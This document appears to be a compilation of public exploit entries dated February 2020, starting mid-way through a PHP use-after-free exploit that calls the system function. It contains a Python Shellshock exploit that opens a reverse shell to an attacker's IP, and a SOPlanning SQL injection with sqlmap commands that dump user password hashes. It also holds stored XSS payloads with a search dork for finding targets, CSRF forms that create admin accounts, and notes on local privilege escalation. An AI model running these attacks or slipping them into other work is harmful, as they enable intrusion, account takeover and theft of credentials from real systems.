$binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg = str_shuffle(str_repeat('A', 79)); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle(str_repeat('A', 79)); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); }

# Exploit Title: SOPlanning 1.45 - 'by' SQL Injection # Date: 2020-02-14 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ # Version 1.45 # Tested on Windows 10/Kali Rolling # The SOPlanning application is vulnerable to SQL Injection in the OrderBy clause of the sort on the Projects page: # POC: # The SOPlanning 1.45 application is vulnerable to SQL Injection which can be leveraged into getting the information for the users table. # Capture the request in Burpsuite: GET /soplanning/www/projets.php?order=nom_createur&by=ASC HTTP/1.1 Host: HOSTNAME User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://HOST/soplanning/www/projets.php?order=charge&by=ASC Connection: close Cookie: xposMois=0; dateDebut=14/02/2020; dateFin=14/04/2020; xposMoisWin=0; xposJoursWin=0; xposJours=0; yposMoisWin=0; yposMois=0; yposJoursWin=0; yposJours=0; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9; soplanningplanning_=pnljrmetd5cse4d8dm1f09fn0u; baseLigne=users; baseColonne=jours; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%5D Upgrade-Insecure-Requests: 1 # Feed the request into SQLMap: sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump Then you will be able to see the information for the users in the database: root@kali:~/SOPlanning# sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump ___ __H__ ___ ___[(]_____ ___ ___ {1.4.1.2#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:13:27 /2020-02-14/ [11:13:27] [INFO] parsing HTTP request from 'projects.req' [11:13:27] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: by (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END)) Type: time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1) --- Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes.

# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution # Exploit Author: Sarang Tumne a.k.a SarT # Date: 2020-02-14 # Confirmed on release 5.2 # Vendor: https://www.avaya.com/en/ # Avaya's advisory: # https://downloads.avaya.com/css/P8/documents/100183151 # Exploit generates a reverse shell to a nc listener (Shellshock Exploit) ############################################### #!/usr/bin/python import sys import requests if len(sys.argv) < 4: print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit" print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337" print "[*] Netcat Listener: nc -lvvnp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() CM = sys.argv[1] url = "https://" + CM + "/mt/mt.cgi" attacker_ip = sys.argv[2] rev_port = sys.argv[3] http_headers = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1' } def main(): if len(sys.argv) == 4: print "[+] Success, spawning a shell on your custom port :)..." requests.get(url, headers=http_headers, verify=False, timeout=5) else: print "[-] Something went wrong, quitting..." sys.exit() if __name__ == "__main__": main()

# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting # Date: 2020-01-23 # Vendor Homepage: https://strongtestimonials.com # Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 2.40.0 and below # CVE : CVE-2020-8549 # 1. Description # Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with # over 90,000 active installations. In the client details section which is seen when adding # or editing a testimonial, the custom[client_name] and custom[company_name] parameters # were found to be vulnerable to stored cross-site scripting. All WordPress websites # using Strong Testimonials version 2.40.0 and below are affected. 2. Proof of Concept When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed. The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page. POST /wp-admin/post.php HTTP/1.1 Host: testing.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit Content-Type: application/x-www-form-urlencoded Content-Length: 1402 Origin: http://testing.com Connection: close Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg Upgrade-Insecure-Requests: 1 _wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator 3. Timeline Vulnerability reported to the Strong Testimonials team – January 23, 2020 Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020

# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-02-14 # Vendor Homepage:https://www8.hp.com/mx/es/home.html # Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe # HP Development Company, L.P. # Tested Version: 1.2.9.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home x64 en # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """ HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto C:\>sc qc HPWMISVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HPWMISVC TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HPWMISVC DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> # Exploit: # A successful attempt would require the local user to be able to insert their code in the system # root path undetected by the OS or other security applications where it could potentially be # executed during application startup or reboot. If successful, the local user's code would # execute with the elevated privileges of the application.

# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path # Exploit Author: boku # Date: 2020-02-10 # Vendor Homepage: https://www.weird-solutions.com # Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe # Version: 2.0.1214 # Tested On: Windows 10 (32-bit) C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """ BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto C:\Users\user>sc qc "BOOTP Turbo" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BOOTP Turbo TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\BOOTP Turbo\bootpt.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BOOTP Turbo DEPENDENCIES : Nsi : Afd : NetBT : Tcpip SERVICE_START_NAME : LocalSystem

# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation # Author: nu11secur1ty # Date: 2020-02-14 # Vendor: Microsoft # Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty # CVE: CVE-2020-0683 [+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) [+] Website: https://www.nu11secur1ty.com/ [+] Source: readme from GitHUB [+] twitter.com/nu11secur1ty [Exploit Program] Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty [Vendor] Microsoft [Vulnerability Type] Windows Installer Elevation of Privilege Vulnerability [CVE Reference] An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and add or remove files. The security update addresses the vulnerability by modifying how to reparse points are handled by the Windows Installer. [Security Issue] Elevation of Privilege from user to C:\Windows\administartion execution files [References] # CVE-2020-0683 Original Poc sent to MSRC. Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683 Source code for Visual Studio C++ 2019 Inside "nu11secur1ty" you'll find the exploit (exe) to execute. # Note: This test is using `system.ini` in c:\Windows\system.ini When you exploit this file you should replace with the original file `system.ini` after this test, which you will find in CVE-2020-0683 directory :) -------------------------------------------------------------------------- - - How to run the exploit Go into "nu11secur1ty" directory and from a cmd console launch: - for the test MsiExploit.exe c:\Windows\system.ini" Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory. - Disclaimer: The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. - @nu11secur1ty [Network Access] Local [Disclosure Timeline] 02/11/2020 [Disclaimer] The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. nu11secur1ty --

# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) # Date: 2020-02-14 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://icehrm.com/ # Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0 # Tested on Windows 10/Kali Rolling # The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change: # POC for user creation: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://HOSTHERE/icehrm/app/service.php"> <input type="hidden" name="t" value="User" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="saveUser" /> <input type="hidden" name="mod" value="admin&#61;users" /> <input type="hidden" name="req" value="&#123;"username"&#58;"test"&#44;"email"&#58;"test&#64;test&#46;com"&#44;"employee"&#58;"1"&#44;"user&#95;level"&#58;"Admin"&#44;"user&#95;roles"&#58;"&#91;&#92;"2&#92;"&#93;"&#44;"lang"&#58;"NULL"&#44;"default&#95;module"&#58;"NULL"&#44;"csrf"&#58;"c0bdded55472fab56c578386143a1854e6f8dd11"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html> # POC for Password Change: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://HOSTHERE/icehrm/app/service.php"> <input type="hidden" name="t" value="User" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="admin&#61;users" /> <input type="hidden" name="req" value="&#123;"id"&#58;1&#44;"pwd"&#58;"admin123"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting # Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply" # Date: 2020-02-14 # Category : Webapps # Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip # Vendor Homepage: https://github.com/Fruitfulcode/Fruitful # Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) # Team Members: Behzad Khalifeh , Milad Ranjbar # Version: 3.8 # Tested on: Windows/Linux # CVE: N/A .:: Theme Description ::. Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design. .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target With above Dork. Step 2 - Inject Your Java Script Codes to Name & Email Fields Step 3 - Click Post Comment .:: Tested Payload ::. '>"><script>alert(/XSS By UltraSecurity/)</script> .:: Post Request ::. comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145

Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path Exploit Author: boku Date: 2020-02-10 Vendor Homepage: https://www.weird-solutions.com Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe Version: 4.6.1298 Tested On: Windows 10 (32-bit) C:\Users\user>sc qc "DHCP Turbo 4" SERVICE_NAME: DHCP Turbo 4 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\DHCP Turbo 4\dhcpt.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DHCP Turbo 4 DEPENDENCIES : Nsi : Afd : NetBT : Tcpip SERVICE_START_NAME : LocalSystem C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo" DisplayName PathName StartMode DHCP Turbo 4 C:\Program Files\DHCP Turbo 4\dhcpt.exe Auto

# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path # Exploit Author: boku # Date: 2020-02-10 # Vendor Homepage: https://www.weird-solutions.com # Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe # Version: 4.6.1273 # Tested On: Windows 10 (32-bit) C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """ TFTP Turbo 4 C:\Program Files\TFTP Turbo 4\tftpt.exe Auto C:\Users\nightelf>sc qc "TFTP Turbo 4" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: TFTP Turbo 4 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\TFTP Turbo 4\tftpt.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : TFTP Turbo 4 DEPENDENCIES : Nsi : Afd : NetBT : Tcpip SERVICE_START_NAME : LocalSystem

# Exploit Title: Wordpress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting # Date: 2020-02-15 # Exploit Author: Shahab.ra.9 # Vendor Homepage: https://products-filter.com/ # Software Link: https://wordpress.org/plugins/woocommerce-products-filter/ # Version: 1.2.3 # Tested on: windows 10 # WOOF - Products Filter for WooCommerce Exploit: http://target/wp-admin/admin.php?page=wc-settings&tab=woof now in tab "design" -> then enter (xss code) in the (textfields) front side ->(Text for block toggle ,Text for block toggle , Custom front css styles file link). then click on button "save changes". then refresh page ,now you see the execution of xss code ,then refersh frontend page site -> "http://target/shop/ " or frontend pages used this plugin the execution of xss code. Demo Poc: http://target/wp-admin/admin.php?page=wc-settings&tab=woof now in tab "design" -> then enter ( ";</script><img src=1 onerror="alert(`xss store bug -> shahab.ra.9`);"><script>var1="1 ) in the (textfields) front side ->(Text for block toggle ,Text for block toggle and Custom front css styles file link). then click on button "save changes".